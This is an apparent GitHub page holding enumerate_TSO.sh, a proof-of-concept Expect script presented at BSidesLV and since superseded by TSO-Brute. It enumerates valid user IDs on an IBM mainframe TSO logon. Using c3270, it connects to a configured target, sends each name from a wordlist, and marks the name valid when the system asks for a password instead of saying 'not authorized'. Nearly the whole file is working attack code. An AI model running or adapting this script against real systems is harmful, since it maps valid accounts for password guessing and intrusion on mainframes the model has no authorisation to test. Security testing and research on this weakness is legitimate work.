forked from mainframed/Mainframed
-
Notifications
You must be signed in to change notification settings - Fork 0
/
enumerate_TSO.sh
executable file
·130 lines (115 loc) · 4.53 KB
/
enumerate_TSO.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
#!/usr/bin/expect -f
#######################
# OLD SCRIPT. Replaced by TSO Brute!
#Script to take advantage of TSO disclosing if a UserID is invalid
# May require changing for your specific environment
# Initially developed by @mainframed767 for BSidesLV
# Requirements: C3270 and Expect
# Note: This script is super slow. It's just a proof of concept.
# Thanks to http://www.kicksfortso.com/same/KooKbooK/KooKbooK-6.htm
#######################
puts "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
puts "!!!! THIS IS A POC SCRIPT. TSO BRUTE HAS SUPERSEDED THIS PROGRAM. IT IS KEPT FOR HISTORICAL REASONS ONLY !!!!"
puts "!!!! THIS VERSION HAS KNOWN BUGS AND WAS JUST POC! !!!!"
puts "!!!! THE NEWEST VERSION CAN BE FOUND AT https://github.com/mainframed/TSO-Brute !!!!"
puts "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
puts ""
puts ""
sleep 30
#change to whatver you want
set target "10.10.0.24" ;# Target IP address
set target_port "23" ;# Target Port
set sleep "2" ;# Change to 1 for faster systems
set userfile "userids.txt" ;# Change to the name of your user listing file
log_user 0 ;# if you want to see what it does change this to 1
###########################################################
# End configuration options
###########################################################
puts "//////////////////////////////////////////////////////"
puts "// I'm in ur mainframe //"
puts "// guessin' your users //"
puts "//////////////////////////////////////////////////////"
puts "//"
set usernames [open $userfile r]
set found "0"
# Initiate a 3270 connction to the $target:$port using C3270
puts "// Connecting to $target:$target_port"
spawn c3270 -model 3279-2 -once $target:$target_port
sleep $sleep
########################################
# You'll need to customize this for your environment
#######################################
set timeout 5
expect {
"==>" { set reply tso }
"Enter your choice==>" { set reply tso }
timeout { set reply timeout }
}
# If it times out
if {![info exists reply]} {
puts "//"
puts "// WARNING:"
puts "// Connection to $target:$target_port"
puts "// timed out or initial logon screen"
puts "// is different and you need to change"
puts "// the script."
puts "//"
puts "// Quiting!"
puts "//"
puts "//////////////////////////////////////////////////////"
exit
}
puts "// Connection Successful"
puts "//"
send "tso\r"
sleep $sleep
send "fake\r" ;# this is the first userid to try. It shouldnt exist and starts the ball rolling
sleep $sleep
#C3270 is now at the TSO/E logon panel, check if first userID was valid it shouldn't be
expect {
"not authorized" { set enum failed }
"Enter current password for" { set enum valid }
timeout { set enum timeout }
}
puts "// Enumerating through $userfile:"
while {[gets $usernames inline] >= 0} {
puts -nonewline "// Trying $inline "
send "$inline\r"
expect {
"not authorized" { set enum failed }
"Enter current password for" { set enum valid }
}
puts -nonewline "::: $enum"
if {$enum == "valid"} {
incr found
send "\035" ; # do ^] to get to c3270 menu
expect "c3270>" { sleep 1; send "quit\n"; }
spawn c3270 -model 3279-2 -once $target:$target_port
sleep $sleep
expect {
"==>" { set reply tso }
"Enter your choice==>" { set reply tso }
timeout { set reply timeout }
}
send "tso\r"
sleep $sleep
send "fake\r"
expect {
"not authorized" { set enum failed }
timeout { set enum timeout }
}
puts -nonewline " ::: Found!"
}
puts ""
sleep $sleep
}
close $usernames
puts "//"
puts "// Done!"
puts "//"
puts "//////////////////////////////////////////////////////"
puts "// Found $found user IDs!!!"
puts "// Closing Connection to $target:$target_port"
puts "//////////////////////////////////////////////////////"
send "\035" ; # do ^] to get to c3270 menu
expect "c3270>" { sleep 1; send "quit\n"; }